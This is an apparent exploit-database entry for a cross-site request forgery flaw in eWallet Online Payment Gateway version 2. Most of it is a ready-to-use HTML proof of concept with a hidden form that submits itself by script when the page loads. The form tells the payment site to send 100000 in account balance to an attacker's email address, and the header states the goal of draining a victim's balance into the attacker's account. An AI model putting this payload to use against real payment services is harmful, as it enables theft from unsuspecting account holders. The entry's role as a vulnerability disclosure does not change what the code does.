eWallet Online Payment Gateway 2 Cross Site Request Forgery

eWallet Online Payment Gateway version 2 suffers from a cross site request forgery vulnerability.


MD5 | 11c2c9fbcd9ffc4cfa4a2ffd44921f1b

# Exploit Title:  eWallet - Online Payment Gateway 2 - Cross-Site Request Forgery
# Date: 2018-05-23
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/ewallet-online-payment-gateway/19316332?s_rank=1110
# Version: 2
# Tested on: Kali linux

# POC :
# eWallet - Online Payment Gateway 2 suffers from csrf vulnerability .
# Attacker can send target account balance to his account .

# Exploit :

<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://idealbrothers.thesoftking.com/walletv2/account/Sent" method="POST">
<input type="hidden" name="sendto" value="[email protected]" />
<input type="hidden" name="amount" value="100000" />
<input type="hidden" name="charge" value="on" />
<input type="hidden" name="message" value="test" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


Related Posts